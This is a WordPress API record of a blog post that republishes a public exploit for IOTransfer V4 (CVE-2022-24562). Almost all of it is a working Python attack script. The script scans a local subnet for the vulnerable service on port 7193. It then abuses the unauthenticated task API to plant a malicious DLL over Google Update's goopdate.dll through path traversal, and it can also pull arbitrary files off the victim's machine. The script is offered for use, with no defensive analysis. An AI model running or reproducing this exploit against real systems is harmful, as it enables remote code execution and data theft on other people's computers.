{"id":28310,"date":"2022-07-24T10:18:34","date_gmt":"2022-07-24T06:18:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167775\/iotransfer40-exec.txt"},"modified":"2022-07-24T13:59:52","modified_gmt":"2022-07-24T09:29:52","slug":"iotransfer-4-0-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/iotransfer-4-0-remote-code-execution\/","title":{"rendered":"IOTransfer 4.0 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: IOTransfer V4 \u2013 Remote Code Execution (RCE)
\n# Date: 06\/22\/2022
\n# Exploit Author: Tomer Peled
\n# Vendor Homepage: https:\/\/www.iobit.com
\n# Software Link: https:\/\/iotransfer.itopvpn.com\/
\n# Version: V4 and onward
\n# Tested on: Windows 10
\n# CVE : 2022-24562
\n# References: https:\/\/github.com\/tomerpeled92\/CVE\/tree\/main\/CVE-2022%E2%80%9324562<\/p>\n

import os
\nfrom urllib3.exceptions import ConnectTimeoutError
\nfrom win32com.client import *
\nimport requests
\nimport json<\/p>\n

localPayloadPath = r”c:\\temp\\malicious.dll”
\nremotePayloadPath=”..\/Program Files (x86)\/Google\/Update\/goopdate.dll”
\nremoteDownloadPath = r’C:\\Users\\User\\Desktop\\obligationservlet.pdf’
\nRange = “192.168.89”
\nUpOrDown=”Upload”
\nIP = “”
\nUserName = “”<\/p>\n

def get_version_number(file_path):
\ninformation_parser = Dispatch(“Scripting.FileSystemObject”)
\nversion = information_parser.GetFileVersion(file_path)
\nreturn version<\/p>\n

def getTaskList(IP, taskid=””):
\nprint(“Getting task list…”)
\nurl = f’http:\/\/{IP}:7193\/index.php?action=gettasklist&userid=*’
\nres = requests.get(url)
\ntasks = json.loads(res.content)
\ntasks = json.loads(tasks[‘content’])
\nfor task in tasks[‘tasks’]:
\nif taskid == task[‘taskid’]:
\nprint(f”Task ID found: {taskid}”)<\/p>\n

def CreateUploadTask(IP):
\nSetSavePath(IP)
\nurl = f’http:\/\/{IP}:7193\/index.php?action=createtask’
\ntask = {
\n‘method’: ‘get’,
\n‘version’: ‘1’,
\n‘userid’: ‘*’,
\n‘taskstate’: ‘0’,
\n}
\nres = requests.post(url, json=task)
\ntask = json.loads(res.content)
\ntask = json.loads(task[‘content’])
\ntaskid = task[‘taskid’]\nprint(f”[*] TaskID: {taskid}”)
\nreturn taskid<\/p>\n

def CreateUploadDetailNode(IP, taskid, remotePath, size=’100′):
\nurl = f’http:\/\/{IP}:7193\/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0′
\nfile_info = {
\n‘size’: size,
\n‘savefilename’: remotePath,
\n‘name’: remotePath,
\n‘fullpath’: r’c:\\windows\\system32\\calc.exe’,
\n‘md5’: ‘md5md5md5md5md5’,
\n‘filetype’: ‘3’,
\n}
\nres = requests.post(url, json=file_info)
\njs = json.loads(res.content)
\nprint(f”[V] Create Detail returned: {js[‘code’]}”)<\/p>\n

def readFile(Path):
\nfile = open(Path, “rb”)
\nbyte = file.read(1)
\nnext = “Start”
\nwhile next != b”:
\nbyte = byte + file.read(1023)
\nnext = file.read(1)
\nif next != b”:
\nbyte = byte + next
\nfile.close()
\nreturn byte<\/p>\n

def CallUpload(IP, taskid, localPayloadPath):
\nurl = f’http:\/\/{IP}:7193\/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0′
\nsend_data = readFile(localPayloadPath)
\ntry:
\nres = requests.post(url, data=send_data)
\njs = json.loads(res.content)
\nif js[‘code’] == 200:
\nprint(“[V] Success payload uploaded!”)
\nelse:
\nprint(f”CreateRemoteFile: {res.content}”)
\nexcept:
\nprint(“[*] Reusing the task…”)
\nres = requests.post(url, data=send_data)
\njs = json.loads(res.content)
\nif js[‘code’] == 200 or “false” in js[‘error’]:
\nprint(“[V] Success payload uploaded!”)
\nelse:
\nprint(f”[X] CreateRemoteFile Failed: {res.content}”)<\/p>\n

def SetSavePath(IP):
\nurl = f’http:\/\/{IP}:7193\/index.php?action=setiotconfig’
\nconfig = {
\n‘tasksavepath’: ‘C:\\\\Program ‘
\n}
\nrequests.post(url, json=config)<\/p>\n

def ExploitUpload(IP,payloadPath,rPath,taskid =None):
\nif not taskid:
\ntaskid = CreateUploadTask(IP)
\nsize = os.path.getsize(payloadPath)
\nCreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))
\nCallUpload(IP, taskid, payloadPath)<\/p>\n

def CreateDownloadTask(IP, Path) -> str:
\nurl = f’http:\/\/{IP}:7193\/index.php?action=createtask’
\ntask = {
\n‘method’: ‘get’,
\n‘version’: ‘1’,
\n‘userid’: ‘*’,
\n‘taskstate’: ‘0’,
\n‘filepath’: Path
\n}
\nres = requests.post(url, json=task)
\ntask = json.loads(res.content)
\ntask = json.loads(task[‘content’])
\ntaskid = task[‘taskid’]\nprint(f”TaskID: {taskid}”)
\nreturn taskid<\/p>\n

def ExploitDownload(IP, DownloadPath, ID=None):
\nif ID:
\nurl = f’http:\/\/{IP}:7193\/index.php?action=downloadfile&userid=*&taskid={ID}’
\nelse:
\ntaskid = CreateDownloadTask(IP, DownloadPath)
\nurl = f’http:\/\/{IP}:7193\/index.php?action=downloadfile&userid=*&taskid={taskid}’
\nres = requests.get(url)
\nreturn res<\/p>\n

def ScanIP(startRange):
\nprint(“[*] Searching for vulnerable IPs”, end=”)
\nCurrent = 142
\nIP = f”{startRange}.{Current}”
\nVulnerableIP: str = “”
\nUserName: str = “”
\nwhile Current < 252:
\nprint(“.”, end=”)
\nurl = f’http:\/\/{IP}:7193\/index.php?action=getpcname&userid=*’
\ntry:
\nres = requests.get(url, timeout=1)
\njs = json.loads(res.content)
\njs2 = json.loads(js[‘content’])
\nUserName = js2[‘name’]\nVulnerableIP=IP
\nprint(f”\\n[V] Found a Vulnerable IP: {VulnerableIP}”)
\nprint(f”[!] Vulnerable PC username: {UserName}”)
\nreturn VulnerableIP,UserName
\nexcept Exception as e:
\npass
\nexcept ConnectTimeoutError:
\npass
\nIP = f”{startRange}.{Current}”
\nCurrent = Current + 1
\nreturn None,None<\/p>\n

if __name__ == ‘__main__’:
\nIP,UserName = ScanIP(Range)
\nif IP is None or UserName is None:
\nprint(“[X] No vulnerable IP found”)
\nexit()
\nprint(“[*] Starting Exploit…”)
\nif UpOrDown == “Upload”:
\nprint(f”[*]Local Payload Path: {localPayloadPath}”)
\nprint(f”[*]Remote Upload Path: {remotePayloadPath}”)
\nExploitUpload(IP,localPayloadPath,remotePayloadPath)
\nelif UpOrDown == “Download”:
\nprint(f”[*] Downloading the file: {remoteDownloadPath}”)
\nres = ExploitDownload(IP, remoteDownloadPath)
\nfile = open(“out.pdf”, “wb+”)
\nfile.write(res.content)
\nfile.close()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: IOTransfer V4 \u2013 Remote Code Execution (RCE) # Date: 06\/22\/2022 # Exploit Author: Tomer Peled # Vendor Homepage: https:\/\/www.iobit.com # Software Link: https:\/\/iotransfer.itopvpn.com\/ # Version: V4 and onward # Tested on: Windows 10 # CVE : 2022-24562 # References: https:\/\/github.com\/tomerpeled92\/CVE\/tree\/main\/CVE-2022%E2%80%9324562 import os from urllib3.exceptions import ConnectTimeoutError from win32com.client import * import requests …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28310","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28310","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28310"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28310\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28310"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28310"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28310"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}